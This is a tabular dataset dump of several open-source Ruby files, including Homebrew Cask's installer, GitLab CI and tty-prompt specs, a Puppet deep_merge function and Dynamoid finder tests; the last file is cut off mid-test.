hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
e2d7a24e2cd235416ee9a58e3c2a019d55523c4e | 15,333 | # frozen_string_literal: true
require "rubygems"
require "formula_installer"
require "unpack_strategy"
require "cask/cask_dependencies"
require "cask/config"
require "cask/download"
require "cask/staged"
require "cask/verify"
require "cask/quarantine"
require "cgi"
module Cask
class Installer
extend Predicable
# TODO: it is unwise for Cask::Staged to be a module, when we are
# dealing with both staged and unstaged Casks here. This should
# either be a class which is only sometimes instantiated, or there
# should be explicit checks on whether staged state is valid in
# every method.
include Staged
def initialize(cask, command: SystemCommand, force: false,
skip_cask_deps: false, binaries: true, verbose: false,
require_sha: false, upgrade: false,
installed_as_dependency: false, quarantine: true)
@cask = cask
@command = command
@force = force
@skip_cask_deps = skip_cask_deps
@binaries = binaries
@verbose = verbose
@require_sha = require_sha
@reinstall = false
@upgrade = upgrade
@installed_as_dependency = installed_as_dependency
@quarantine = quarantine
end
attr_predicate :binaries?, :force?, :skip_cask_deps?, :require_sha?,
:reinstall?, :upgrade?, :verbose?, :installed_as_dependency?,
:quarantine?
# Renders the cask's caveats section for display, prefixed with an
# "ohai"-style title. Returns nil when the cask declares no caveats.
def self.caveats(cask)
odebug "Printing caveats"
text = cask.caveats
return if text.empty?
"#{ohai_title "Caveats"}\n#{text}\n"
end
# Resolves dependencies, then downloads and verifies the cask artifact.
# Populates @downloaded_path as a side effect (via #download).
def fetch
odebug "Cask::Installer#fetch"
satisfy_dependencies
# With --require-sha (and no --force), refuse casks that skip checksums.
verify_has_sha if require_sha? && !force?
download
verify
end
# Stages the downloaded container into the Caskroom and saves a copy of
# the caskfile. Any failure purges the partially staged version before
# re-raising.
def stage
odebug "Cask::Installer#stage"
Caskroom.ensure_caskroom_exists
unpack_dependencies
extract_primary_container
save_caskfile
rescue => e
# Roll back: remove whatever was staged for this version.
purge_versioned_files
raise e
end
# Full installation flow: guards against double-install, checks conflicts,
# fetches, stages, and installs artifacts. On any error the pre-install
# backup (if one was taken) is restored before the exception propagates.
def install
odebug "Cask::Installer#install"
# Remember the config so user customizations survive the re-stage below.
old_config = @cask.config
raise CaskAlreadyInstalledError, @cask if @cask.installed? && !force? && !reinstall? && !upgrade?
check_conflicts
print caveats
fetch
uninstall_existing_cask if reinstall?
# A forced install over an existing staged version backs it up first so
# it can be restored if this install fails.
backup if force? && @cask.staged_path.exist? && @cask.metadata_versioned_path.exist?
oh1 "Installing Cask #{Formatter.identifier(@cask)}"
opoo "macOS's Gatekeeper has been disabled for this Cask" unless quarantine?
stage
@cask.config = Config.global.merge(old_config)
install_artifacts
# Analytics only for public taps.
::Utils::Analytics.report_event("cask_install", @cask.token) unless @cask.tap&.private?
purge_backed_up_versioned_files
puts summary
rescue
restore_backup
raise
end
# Raises CaskConflictError if any cask listed in `conflicts_with` is
# currently installed. Conflicting casks that cannot be loaded at all
# are skipped — an uninstallable cask cannot conflict.
def check_conflicts
return unless @cask.conflicts_with
@cask.conflicts_with[:cask].each do |conflicting_cask|
conflicting_cask = CaskLoader.load(conflicting_cask)
raise CaskConflictError.new(@cask, conflicting_cask) if conflicting_cask.installed?
rescue CaskUnavailableError
next # Ignore conflicting Casks that do not exist.
end
end
def reinstall
odebug "Cask::Installer#reinstall"
@reinstall = true
install
end
def uninstall_existing_cask
return unless @cask.installed?
# use the same cask file that was used for installation, if possible
installed_caskfile = @cask.installed_caskfile
installed_cask = installed_caskfile.exist? ? CaskLoader.load(installed_caskfile) : @cask
# Always force uninstallation, ignore method parameter
Installer.new(installed_cask, binaries: binaries?, verbose: verbose?, force: true, upgrade: upgrade?).uninstall
end
# Builds the frozen user-facing success message shown after an
# install or upgrade completes.
def summary
badge = Emoji.enabled? ? "#{Emoji.install_badge} " : ""
verb = upgrade? ? "upgraded" : "installed"
"#{badge}#{@cask} was successfully #{verb}!".freeze
end
def download
odebug "Downloading"
@downloaded_path = Download.new(@cask, force: false, quarantine: quarantine?).perform
odebug "Downloaded to -> #{@downloaded_path}"
@downloaded_path
end
# Ensures the cask declares a real checksum. Raises CaskNoShasumError
# when the cask opts out with `sha256 :no_check`.
def verify_has_sha
odebug "Checking cask has checksum"
raise CaskNoShasumError, @cask.token if @cask.sha256 == :no_check
end
def verify
Verify.all(@cask, @downloaded_path)
end
# Memoized unpack strategy for the downloaded file. The container type
# declared by the cask (if any) overrides autodetection.
def primary_container
# `||= begin ... end` around a single expression is redundant
# (RuboCop Style/RedundantBegin); assign the expression directly.
@primary_container ||= UnpackStrategy.detect(@downloaded_path, type: @cask.container&.type, merge_xattrs: true)
end
# Extracts the downloaded container into the cask's staged path. When the
# cask declares a nested container, the outer container is extracted to a
# temp dir first and the nested one is extracted from there. Finally,
# quarantine attributes are propagated when quarantine is enabled.
def extract_primary_container
odebug "Extracting primary container"
odebug "Using container class #{primary_container.class} for #{@downloaded_path}"
basename = CGI.unescape(File.basename(@cask.url.path))
# NOTE: intentional assignment-in-condition — nil when no nested container.
if nested_container = @cask.container&.nested
Dir.mktmpdir do |tmpdir|
tmpdir = Pathname(tmpdir)
primary_container.extract(to: tmpdir, basename: basename, verbose: verbose?)
# Some containers extract read-only files; make them writable so the
# nested container can be detected and extracted.
FileUtils.chmod_R "+rw", tmpdir/nested_container, force: true, verbose: verbose?
UnpackStrategy.detect(tmpdir/nested_container, merge_xattrs: true)
.extract_nestedly(to: @cask.staged_path, verbose: verbose?)
end
else
primary_container.extract_nestedly(to: @cask.staged_path, basename: basename, verbose: verbose?)
end
return unless quarantine?
return unless Quarantine.available?
Quarantine.propagate(from: @downloaded_path, to: @cask.staged_path)
end
# Runs the install phase of every artifact defined by the cask, recording
# each success so that a failure part-way through can be rolled back by
# uninstalling the already-installed artifacts in reverse order.
def install_artifacts
already_installed_artifacts = []
odebug "Installing artifacts"
artifacts = @cask.artifacts
odebug "#{artifacts.length} artifact/s defined", artifacts
artifacts.each do |artifact|
next unless artifact.respond_to?(:install_phase)
odebug "Installing artifact of class #{artifact.class}"
# Binary artifacts are skipped entirely when --no-binaries was given.
if artifact.is_a?(Artifact::Binary)
next unless binaries?
end
artifact.install_phase(command: @command, verbose: verbose?, force: force?)
# unshift => rollback below proceeds in reverse installation order.
already_installed_artifacts.unshift(artifact)
end
save_config_file
rescue => e
begin
already_installed_artifacts.each do |artifact|
next unless artifact.respond_to?(:uninstall_phase)
odebug "Reverting installation of artifact of class #{artifact.class}"
artifact.uninstall_phase(command: @command, verbose: verbose?, force: force?)
end
# Post-uninstall hooks run only after all uninstall phases completed.
already_installed_artifacts.each do |artifact|
next unless artifact.respond_to?(:post_uninstall_phase)
odebug "Reverting installation of artifact of class #{artifact.class}"
artifact.post_uninstall_phase(command: @command, verbose: verbose?, force: force?)
end
ensure
# Always purge the staged version and re-raise the original error.
purge_versioned_files
raise e
end
end
# TODO: move dependencies to a separate class,
# dependencies should also apply for `brew cask stage`,
# override dependencies with `--force` or perhaps `--force-deps`
def satisfy_dependencies
return unless @cask.depends_on
ohai "Satisfying dependencies"
macos_dependencies
arch_dependencies
x11_dependencies
formula_dependencies
cask_dependencies unless skip_cask_deps? || installed_as_dependency?
end
# Validates the cask's macOS version requirement, raising CaskError with
# a descriptive message when the running system does not satisfy it.
def macos_dependencies
macos_requirement = @cask.depends_on.macos
return if !macos_requirement || macos_requirement.satisfied?
raise CaskError, macos_requirement.message(type: :cask)
end
def arch_dependencies
return if @cask.depends_on.arch.nil?
@current_arch ||= { type: Hardware::CPU.type, bits: Hardware::CPU.bits }
return if @cask.depends_on.arch.any? do |arch|
arch[:type] == @current_arch[:type] &&
Array(arch[:bits]).include?(@current_arch[:bits])
end
raise CaskError,
"Cask #{@cask} depends on hardware architecture being one of " \
"[#{@cask.depends_on.arch.map(&:to_s).join(", ")}], " \
"but you are running #{@current_arch}"
end
def x11_dependencies
return unless @cask.depends_on.x11
raise CaskX11DependencyError, @cask.token unless MacOS::X11.installed?
end
def formula_dependencies
formulae = @cask.depends_on.formula.map { |f| Formula[f] }
return if formulae.empty?
if formulae.all?(&:any_version_installed?)
puts "All Formula dependencies satisfied."
return
end
not_installed = formulae.reject(&:any_version_installed?)
ohai "Installing Formula dependencies: #{not_installed.map(&:to_s).join(", ")}"
not_installed.each do |formula|
FormulaInstaller.new(formula).tap do |fi|
fi.installed_as_dependency = true
fi.installed_on_request = false
fi.show_header = true
fi.verbose = verbose?
fi.prelude
fi.install
fi.finish
end
end
end
def cask_dependencies
casks = CaskDependencies.new(@cask)
return if casks.empty?
if casks.all?(&:installed?)
puts "All Cask dependencies satisfied."
return
end
not_installed = casks.reject(&:installed?)
ohai "Installing Cask dependencies: #{not_installed.map(&:to_s).join(", ")}"
not_installed.each do |cask|
Installer.new(
cask,
binaries: binaries?,
verbose: verbose?,
installed_as_dependency: true,
force: false,
).install
end
end
def unpack_dependencies
formulae = primary_container.dependencies.select { |dep| dep.is_a?(Formula) }
casks = primary_container.dependencies.select { |dep| dep.is_a?(Cask) }
.flat_map { |cask| [*CaskDependencies.new(cask), cask] }
not_installed_formulae = formulae.reject(&:any_version_installed?)
not_installed_casks = casks.reject(&:installed?)
return if (not_installed_formulae + not_installed_casks).empty?
ohai "Satisfying unpack dependencies"
not_installed_formulae.each do |formula|
FormulaInstaller.new(formula).tap do |fi|
fi.installed_as_dependency = true
fi.installed_on_request = false
fi.show_header = true
fi.verbose = verbose?
fi.prelude
fi.install
fi.finish
end
end
not_installed_casks.each do |cask|
Installer.new(cask, verbose: verbose?, installed_as_dependency: true).install
end
end
def caveats
self.class.caveats(@cask)
end
def save_caskfile
old_savedir = @cask.metadata_timestamped_path
return unless @cask.sourcefile_path
savedir = @cask.metadata_subdir("Casks", timestamp: :now, create: true)
FileUtils.copy @cask.sourcefile_path, savedir
old_savedir&.rmtree
end
def save_config_file
@cask.config_path.atomic_write(@cask.config.to_json)
end
def uninstall
oh1 "Uninstalling Cask #{Formatter.identifier(@cask)}"
uninstall_artifacts(clear: true)
remove_config_file unless reinstall? || upgrade?
purge_versioned_files
purge_caskroom_path if force?
end
def remove_config_file
FileUtils.rm_f @cask.config_path
@cask.config_path.parent.rmdir_if_possible
end
def start_upgrade
uninstall_artifacts
backup
end
def backup
@cask.staged_path.rename backup_path
@cask.metadata_versioned_path.rename backup_metadata_path
end
# Restores the staged files and versioned metadata from the `.upgrading`
# backup created by #backup, replacing whatever is currently staged.
# No-op unless both backup directories exist.
def restore_backup
return unless backup_path.directory? && backup_metadata_path.directory?
# staged_path and metadata_versioned_path are already Pathnames (they are
# used with #exist?/#rename throughout this class), so the previous
# Pathname.new(...) wrapping was redundant.
@cask.staged_path.rmtree if @cask.staged_path.exist?
@cask.metadata_versioned_path.rmtree if @cask.metadata_versioned_path.exist?
backup_path.rename @cask.staged_path
backup_metadata_path.rename @cask.metadata_versioned_path
end
def revert_upgrade
opoo "Reverting upgrade for Cask #{@cask}"
restore_backup
install_artifacts
end
def finalize_upgrade
ohai "Purging files for version #{@cask.version} of Cask #{@cask}"
purge_backed_up_versioned_files
puts summary
end
# Runs the uninstall phase (then the post-uninstall phase) of every
# artifact that supports one. `clear: true` is passed through as `skip:`
# to each phase — used by #uninstall when wiping rather than upgrading.
def uninstall_artifacts(clear: false)
odebug "Uninstalling artifacts"
artifacts = @cask.artifacts
odebug "#{artifacts.length} artifact/s defined", artifacts
artifacts.each do |artifact|
next unless artifact.respond_to?(:uninstall_phase)
odebug "Uninstalling artifact of class #{artifact.class}"
artifact.uninstall_phase(command: @command, verbose: verbose?, skip: clear, force: force?, upgrade: upgrade?)
end
# Post-uninstall hooks run in a second pass, after every uninstall phase.
artifacts.each do |artifact|
next unless artifact.respond_to?(:post_uninstall_phase)
odebug "Post-uninstalling artifact of class #{artifact.class}"
artifact.post_uninstall_phase(
command: @command, verbose: verbose?, skip: clear, force: force?, upgrade: upgrade?,
)
end
end
def zap
ohai %Q(Implied "brew cask uninstall #{@cask}")
uninstall_artifacts
if (zap_stanzas = @cask.artifacts.select { |a| a.is_a?(Artifact::Zap) }).empty?
opoo "No zap stanza present for Cask '#{@cask}'"
else
ohai "Dispatching zap stanza"
zap_stanzas.each do |stanza|
stanza.zap_phase(command: @command, verbose: verbose?, force: force?)
end
end
ohai "Removing all staged versions of Cask '#{@cask}'"
purge_caskroom_path
end
# Location where the staged version is parked during an upgrade or
# forced reinstall; nil when the cask has no staged path.
def backup_path
staged = @cask.staged_path
return if staged.nil?
Pathname("#{staged}.upgrading")
end
# Location where the versioned metadata directory is parked during an
# upgrade or forced reinstall; nil when the cask has no metadata path.
def backup_metadata_path
metadata = @cask.metadata_versioned_path
return if metadata.nil?
Pathname("#{metadata}.upgrading")
end
def gain_permissions_remove(path)
Utils.gain_permissions_remove(path, command: @command)
end
def purge_backed_up_versioned_files
# versioned staged distribution
gain_permissions_remove(backup_path) if backup_path&.exist?
# Homebrew Cask metadata
return unless backup_metadata_path.directory?
backup_metadata_path.children.each do |subdir|
gain_permissions_remove(subdir)
end
backup_metadata_path.rmdir_if_possible
end
def purge_versioned_files
ohai "Purging files for version #{@cask.version} of Cask #{@cask}"
# versioned staged distribution
gain_permissions_remove(@cask.staged_path) if @cask.staged_path&.exist?
# Homebrew Cask metadata
if @cask.metadata_versioned_path.directory?
@cask.metadata_versioned_path.children.each do |subdir|
gain_permissions_remove(subdir)
end
@cask.metadata_versioned_path.rmdir_if_possible
end
@cask.metadata_master_container_path.rmdir_if_possible unless upgrade?
# toplevel staged distribution
@cask.caskroom_path.rmdir_if_possible unless upgrade?
end
def purge_caskroom_path
odebug "Purging all staged versions of Cask #{@cask}"
gain_permissions_remove(@cask.caskroom_path)
end
end
end
| 29.429942 | 117 | 0.663732 |
1ddf7881e81121f6019c79c57677dceb300df619 | 2,610 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe Gitlab::Ci::Config::Entry::Script do
let(:entry) { described_class.new(config) }
describe 'validations' do
context 'when entry config value is array of strings' do
let(:config) { %w(ls pwd) }
describe '#value' do
it 'returns array of strings' do
expect(entry.value).to eq config
end
end
describe '#errors' do
it 'does not append errors' do
expect(entry.errors).to be_empty
end
end
describe '#valid?' do
it 'is valid' do
expect(entry).to be_valid
end
end
end
context 'when entry config value is array of arrays of strings' do
let(:config) { [['ls'], ['pwd', 'echo 1']] }
describe '#value' do
it 'returns array of strings' do
expect(entry.value).to eq ['ls', 'pwd', 'echo 1']
end
end
describe '#errors' do
it 'does not append errors' do
expect(entry.errors).to be_empty
end
end
describe '#valid?' do
it 'is valid' do
expect(entry).to be_valid
end
end
end
context 'when entry config value is array containing strings and arrays of strings' do
let(:config) { ['ls', ['pwd', 'echo 1']] }
describe '#value' do
it 'returns array of strings' do
expect(entry.value).to eq ['ls', 'pwd', 'echo 1']
end
end
describe '#errors' do
it 'does not append errors' do
expect(entry.errors).to be_empty
end
end
describe '#valid?' do
it 'is valid' do
expect(entry).to be_valid
end
end
end
context 'when entry value is string' do
let(:config) { 'ls' }
describe '#errors' do
it 'saves errors' do
expect(entry.errors)
.to include 'script config should be an array containing strings and arrays of strings'
end
end
describe '#valid?' do
it 'is not valid' do
expect(entry).not_to be_valid
end
end
end
context 'when entry value is multi-level nested array' do
let(:config) { [['ls', ['echo 1']], 'pwd'] }
describe '#errors' do
it 'saves errors' do
expect(entry.errors)
.to include 'script config should be an array containing strings and arrays of strings'
end
end
describe '#valid?' do
it 'is not valid' do
expect(entry).not_to be_valid
end
end
end
end
end
| 23.727273 | 99 | 0.557471 |
33dc5821cac35fadaa1680bd2cf5a7d8b8d7fbec | 973 | require 'test_helper'
class CartsControllerTest < ActionDispatch::IntegrationTest
setup do
@cart = carts(:one)
end
test "should get index" do
get carts_url
assert_response :success
end
test "should get new" do
get new_cart_url
assert_response :success
end
test "should create cart" do
assert_difference('Cart.count') do
post carts_url, params: { cart: { total: @cart.total } }
end
assert_redirected_to cart_url(Cart.last)
end
test "should show cart" do
get cart_url(@cart)
assert_response :success
end
test "should get edit" do
get edit_cart_url(@cart)
assert_response :success
end
test "should update cart" do
patch cart_url(@cart), params: { cart: { total: @cart.total } }
assert_redirected_to cart_url(@cart)
end
test "should destroy cart" do
assert_difference('Cart.count', -1) do
delete cart_url(@cart)
end
assert_redirected_to carts_url
end
end
| 19.857143 | 67 | 0.685509 |
2844bbbcacb9233d070c85016eca6255f33edaeb | 612 | class Billing < ActiveRecord::Base
validates :number, uniqueness: true
validates :number, presence: true
validates :project_id, presence: true
validates :period_id, presence: true
# validates :person_id, presence: true
validates :user, presence: true
validates :billing_date, presence: true
validates :status, presence: true
belongs_to :project
belongs_to :period
belongs_to :person
belongs_to :user
has_many :receive_amounts
scope :outstanding, -> {where(status: '0')}
scope :received, -> {where(status: '1')}
end
| 30.6 | 46 | 0.656863 |
ac8512b66fada5fcefc357fccbc0b27a25eb00cd | 5,230 | # frozen_string_literal: true
RSpec.describe TTY::Prompt, "#ask" do
subject(:prompt) { TTY::Prompt::Test.new }
it "asks question" do
prompt.ask("What is your name?")
expect(prompt.output.string).to eq([
"What is your name? ",
"\e[1A\e[2K\e[1G",
"What is your name? \n"
].join)
end
it "asks an empty question " do
prompt.input << "\r"
prompt.input.rewind
answer = prompt.ask
expect(answer).to eq(nil)
expect(prompt.output.string).to eql("\e[2K\e[1G\n\e[1A\e[2K\e[1G\n")
end
it "asks an empty question and returns nil if EOF is sent to stdin" do
prompt.input << nil
prompt.input.rewind
answer = prompt.ask("")
expect(answer).to eql(nil)
expect(prompt.output.string).to eq("\e[1A\e[2K\e[1G\n")
end
it "asks an empty question with prepopulated value" do
prompt.input << "\n"
prompt.input.rewind
answer = prompt.ask value: "yes"
expect(answer).to eq("yes")
expect(prompt.output.string).to eq([
"yes\e[2K\e[1G",
"yes\n\e[1A\e[2K\e[1G",
"\e[32myes\e[0m\n"
].join)
end
it "asks question with prepopulated value" do
prompt = TTY::Prompt::Test.new prefix: "> "
prompt.input << "\n"
prompt.input.rewind
answer = prompt.ask("Say?") do |q|
q.value "yes"
end
expect(answer).to eq("yes")
expect(prompt.output.string).to eq([
"> Say? yes\e[2K\e[1G",
"> Say? yes\n\e[1A\e[2K\e[1G",
"> Say? \e[32myes\e[0m\n"
].join)
end
it "asks a question with a prefix [?]" do
prompt = TTY::Prompt::Test.new(prefix: "[?] ")
prompt.input << "\r"
prompt.input.rewind
answer = prompt.ask "Are you Polish?"
expect(answer).to eq(nil)
expect(prompt.output.string).to eq([
"[?] Are you Polish? ",
"\e[2K\e[1G[?] Are you Polish? \n",
"\e[1A\e[2K\e[1G",
"[?] Are you Polish? \n"
].join)
end
it "asks a question with block" do
prompt.input << ""
prompt.input.rewind
answer = prompt.ask "What is your name?" do |q|
q.default "Piotr"
end
expect(answer).to eq("Piotr")
expect(prompt.output.string).to eq([
"What is your name? \e[90m(Piotr)\e[0m ",
"\e[1A\e[2K\e[1G",
"What is your name? \e[32mPiotr\e[0m\n"
].join)
end
it "changes question color" do
prompt.input << ""
prompt.input.rewind
options = {default: "Piotr", help_color: :red, active_color: :cyan}
answer = prompt.ask("What is your name?", **options)
expect(answer).to eq("Piotr")
expect(prompt.output.string).to eq([
"What is your name? \e[31m(Piotr)\e[0m ",
"\e[1A\e[2K\e[1G",
"What is your name? \e[36mPiotr\e[0m\n"
].join)
end
it "permits empty default parameter" do
prompt.input << "\r"
prompt.input.rewind
answer = prompt.ask("What is your name?", default: "")
expect(answer).to eq("")
expect(prompt.output.string).to eq([
"What is your name? ",
"\e[2K\e[1GWhat is your name? \n",
"\e[1A\e[2K\e[1G",
"What is your name? \n"
].join)
end
it "permits nil default parameter" do
prompt.input << "\r"
prompt.input.rewind
answer = prompt.ask("What is your name?", default: nil)
expect(answer).to eq(nil)
expect(prompt.output.string).to eq([
"What is your name? ",
"\e[2K\e[1GWhat is your name? \n",
"\e[1A\e[2K\e[1G",
"What is your name? \n"
].join)
end
it "sets quiet mode" do
prompt.ask("What is your name?", quiet: true)
expect(prompt.output.string).to eq([
"What is your name? ",
"\e[1A\e[2K\e[1G"
].join)
end
it "sets quiet mode through DSL" do
prompt.ask("What is your name?") do |q|
q.quiet true
end
expect(prompt.output.string).to eq([
"What is your name? ",
"\e[1A\e[2K\e[1G"
].join)
end
it "overwrites global settings" do
active = ->(str) { Pastel.new.cyan(str) }
help = Pastel.new.red.detach
global_settings = {prefix: "[?] ", active_color: active, help_color: help}
prompt = TTY::Prompt::Test.new(**global_settings)
prompt.input << "Piotr\r"
prompt.input.rewind
prompt.ask("What is your name?")
prompt.input << "Piotr\r"
prompt.input.rewind
local_settings = {prefix: ":-) ", active_color: :blue, help_color: :magenta}
prompt.ask("What is your name?", **local_settings)
expect(prompt.output.string).to eq([
"[?] What is your name? ",
"\e[2K\e[1G[?] What is your name? P",
"\e[2K\e[1G[?] What is your name? Pi",
"\e[2K\e[1G[?] What is your name? Pio",
"\e[2K\e[1G[?] What is your name? Piot",
"\e[2K\e[1G[?] What is your name? Piotr",
"\e[2K\e[1G[?] What is your name? Piotr\n",
"\e[1A\e[2K\e[1G",
"[?] What is your name? \e[36mPiotr\e[0m\n",
":-) What is your name? ",
"\e[2K\e[1G:-) What is your name? P",
"\e[2K\e[1G:-) What is your name? Pi",
"\e[2K\e[1G:-) What is your name? Pio",
"\e[2K\e[1G:-) What is your name? Piot",
"\e[2K\e[1G:-) What is your name? Piotr",
"\e[2K\e[1G:-) What is your name? Piotr\n",
"\e[1A\e[2K\e[1G",
":-) What is your name? \e[34mPiotr\e[0m\n"
].join)
end
end
| 27.382199 | 80 | 0.574187 |
e87307c006de7d1cae378afed01042d9370f8e52 | 1,182 | require 'facter'
require File.join(File.dirname(__FILE__), '..', 'jenkins.rb')
require File.join(File.dirname(__FILE__), '..', 'jenkins/plugins.rb')
module Puppet
module Jenkins
# Custom Facter facts describing the installed Jenkins plugins.
module Facts
# Method to call the Facter DSL and dynamically add facts at runtime.
#
# This method is necessary to add reasonable RSpec coverage for the custom
# fact
#
# @return [NilClass]
def self.install
Facter.add(:jenkins_plugins) do
# Jenkins plugin discovery only works on Linux hosts.
confine :kernel => "Linux"
setcode do
Puppet::Jenkins::Facts.plugins_str
end
end
return nil
end
# Return a list of plugins and their versions, e.g.:
# pam-auth 1.1, pmd 3.36, rake 1.7.8
#
# @return [String] Comma-separated version of "<plugin> <version>", empty
# string if there are no plugins
def self.plugins_str
plugins = Puppet::Jenkins::Plugins.available
buffer = []
# Sort by plugin name so the fact value is stable between runs.
plugins.keys.sort.each do |plugin|
manifest = plugins[plugin]
buffer << "#{plugin} #{manifest[:plugin_version]}"
end
return buffer.join(', ')
end
end
end
end
| 28.829268 | 80 | 0.593063 |
bf62576cfd6f9b0f16282b3ac11a842c69787265 | 1,619 | #
# deep_merge.rb
#
# Registers the `deep_merge` parser function with Puppet.
module Puppet::Parser::Functions
newfunction(:deep_merge, :type => :rvalue, :doc => <<-'DOC') do |args|
@summary
Recursively merges two or more hashes together and returns the resulting hash.
@example Example usage
$hash1 = {'one' => 1, 'two' => 2, 'three' => { 'four' => 4 } }
$hash2 = {'two' => 'dos', 'three' => { 'five' => 5 } }
$merged_hash = deep_merge($hash1, $hash2)
The resulting hash is equivalent to:
$merged_hash = { 'one' => 1, 'two' => 'dos', 'three' => { 'four' => 4, 'five' => 5 } }
When there is a duplicate key that is a hash, they are recursively merged.
When there is a duplicate key that is not a hash, the key in the rightmost hash will "win."
@return [Hash] The merged hash
DOC
# At least two hashes are required for a merge to be meaningful.
if args.length < 2
raise Puppet::ParseError, "deep_merge(): wrong number of arguments (#{args.length}; must be at least 2)"
end
# Recursive merge: when both sides of a duplicate key are hashes, merge
# them; otherwise the right-hand (newer) value wins.
deep_merge = proc do |hash1, hash2|
hash1.merge(hash2) do |_key, old_value, new_value|
if old_value.is_a?(Hash) && new_value.is_a?(Hash)
deep_merge.call(old_value, new_value)
else
new_value
end
end
end
result = {}
args.each do |arg|
next if arg.is_a?(String) && arg.empty? # empty string is synonym for puppet's undef
# If the argument was not a hash, skip it.
unless arg.is_a?(Hash)
raise Puppet::ParseError, "deep_merge: unexpected argument type #{arg.class}, only expects hash arguments"
end
result = deep_merge.call(result, arg)
end
return(result)
end
end
3842c7a05c789ffacffc98897995c333764b542e | 19,010 | # frozen_string_literal: true
require 'spec_helper'
describe Dynamoid::Finders do
let!(:address) { Address.create(city: 'Chicago') }
describe '.find' do
let(:klass) do
new_class(class_name: 'Document')
end
let(:klass_with_composite_key) do
new_class(class_name: 'Cat') do
range :age, :integer
end
end
context 'one primary key provided' do
context 'simple primary key' do
it 'finds' do
obj = klass.create
expect(klass.find(obj.id)).to eql(obj)
end
it 'raises RecordNotFound error when found nothing' do
klass.create_table
expect {
klass.find('wrong-id')
}.to raise_error(Dynamoid::Errors::RecordNotFound, "Couldn't find Document with primary key wrong-id")
end
end
context 'composite primary key' do
it 'finds' do
obj = klass_with_composite_key.create(age: 12)
expect(klass_with_composite_key.find(obj.id, range_key: 12)).to eql(obj)
end
it 'raises RecordNotFound error when found nothing' do
klass_with_composite_key.create_table
expect {
klass_with_composite_key.find('wrong-id', range_key: 100_500)
}.to raise_error(Dynamoid::Errors::RecordNotFound, "Couldn't find Cat with primary key (wrong-id,100500)")
end
it 'type casts a sort key value' do
obj = klass_with_composite_key.create(age: 12)
expect(klass_with_composite_key.find(obj.id, range_key: '12.333')).to eql(obj)
end
it 'dumps a sort key value' do
klass_with_date = new_class do
range :published_on, :date
end
date = '2018/07/26'.to_date
obj = klass_with_date.create(published_on: date)
expect(klass_with_date.find(obj.id, range_key: date)).to eql(obj)
end
end
it 'returns persisted? object' do
obj = klass.create
expect(klass.find(obj.id)).to be_persisted
end
context 'field is not declared in document' do
let(:class_with_not_declared_field) do
new_class do
field :name
end
end
before do
class_with_not_declared_field.create_table
end
it 'ignores it without exceptions' do
Dynamoid.adapter.put_item(class_with_not_declared_field.table_name, id: '1', bod: '1996-12-21')
obj = class_with_not_declared_field.find('1')
expect(obj.id).to eql('1')
end
end
end
context 'multiple primary keys provided' do
context 'simple primary key' do
it 'finds with an array of keys' do
objects = (1..2).map { klass.create }
obj1, obj2 = objects
expect(klass.find([obj1.id, obj2.id])).to match_array(objects)
end
it 'finds with one key' do
obj = klass_with_composite_key.create(age: 12)
expect(klass_with_composite_key.find([[obj.id, obj.age]])).to eq([obj])
end
it 'returns an empty array if an empty array passed' do
klass.create_table
expect(klass.find([])).to eql([])
end
it 'raises RecordNotFound error when some objects are not found' do
objects = (1..2).map { klass.create }
obj1, obj2 = objects
expect {
klass.find([obj1.id, obj2.id, 'wrong-id'])
}.to raise_error(
Dynamoid::Errors::RecordNotFound,
"Couldn't find all Documents with primary keys [#{obj1.id}, #{obj2.id}, wrong-id] " \
'(found 2 results, but was looking for 3)'
)
end
it 'raises RecordNotFound if only one primary key provided and no result found' do
klass.create_table
expect {
klass.find(['wrong-id'])
}.to raise_error(
Dynamoid::Errors::RecordNotFound,
"Couldn't find all Documents with primary keys [wrong-id] (found 0 results, but was looking for 1)"
)
end
it 'finds with a list of keys' do
objects = (1..2).map { klass.create }
obj1, obj2 = objects
expect(klass.find(obj1.id, obj2.id)).to match_array(objects)
end
end
context 'composite primary key' do
it 'finds with an array of keys' do
objects = (1..2).map { |i| klass_with_composite_key.create(age: i) }
obj1, obj2 = objects
expect(klass_with_composite_key.find([[obj1.id, obj1.age], [obj2.id, obj2.age]])).to match_array(objects)
end
it 'finds with one key' do
obj = klass_with_composite_key.create(age: 12)
expect(klass_with_composite_key.find([[obj.id, obj.age]])).to eq([obj])
end
it 'returns an empty array if an empty array passed' do
klass_with_composite_key.create_table
expect(klass_with_composite_key.find([])).to eql([])
end
it 'raises RecordNotFound error when some objects are not found' do
obj = klass_with_composite_key.create(age: 12)
expect {
klass_with_composite_key.find([[obj.id, obj.age], ['wrong-id', 100_500]])
}.to raise_error(
Dynamoid::Errors::RecordNotFound,
"Couldn't find all Cats with primary keys [(#{obj.id},12), (wrong-id,100500)] (found 1 results, but was looking for 2)"
)
end
it 'raises RecordNotFound if only one primary key provided and no result found' do
klass_with_composite_key.create_table
expect {
klass_with_composite_key.find([['wrong-id', 100_500]])
}.to raise_error(
Dynamoid::Errors::RecordNotFound,
"Couldn't find all Cats with primary keys [(wrong-id,100500)] (found 0 results, but was looking for 1)"
)
end
it 'finds with a list of keys' do
pending 'still is not implemented'
objects = (1..2).map { |i| klass_with_composite_key.create(age: i) }
obj1, obj2 = objects
expect(klass_with_composite_key.find([obj1.id, obj1.age], [obj2.id, obj2.age])).to match_array(objects)
end
it 'type casts a sort key value' do
objects = (1..2).map { |i| klass_with_composite_key.create(age: i) }
obj1, obj2 = objects
expect(klass_with_composite_key.find([[obj1.id, '1'], [obj2.id, '2']])).to match_array(objects)
end
it 'dumps a sort key value' do
klass_with_date = new_class do
range :published_on, :date
end
obj1 = klass_with_date.create(published_on: '2018/07/26'.to_date)
obj2 = klass_with_date.create(published_on: '2018/07/27'.to_date)
expect(
klass_with_date.find([[obj1.id, obj1.published_on], [obj2.id, obj2.published_on]])
).to match_array([obj1, obj2])
end
end
it 'returns persisted? objects' do
objects = (1..2).map { |i| klass_with_composite_key.create(age: i) }
obj1, obj2 = objects
objects = klass_with_composite_key.find([[obj1.id, obj1.age], [obj2.id, obj2.age]])
obj1, obj2 = objects
expect(obj1).to be_persisted
expect(obj2).to be_persisted
end
context 'field is not declared in document' do
let(:class_with_not_declared_field) do
new_class do
field :name
end
end
before do
class_with_not_declared_field.create_table
end
it 'ignores it without exceptions' do
Dynamoid.adapter.put_item(class_with_not_declared_field.table_name, id: '1', dob: '1996-12-21')
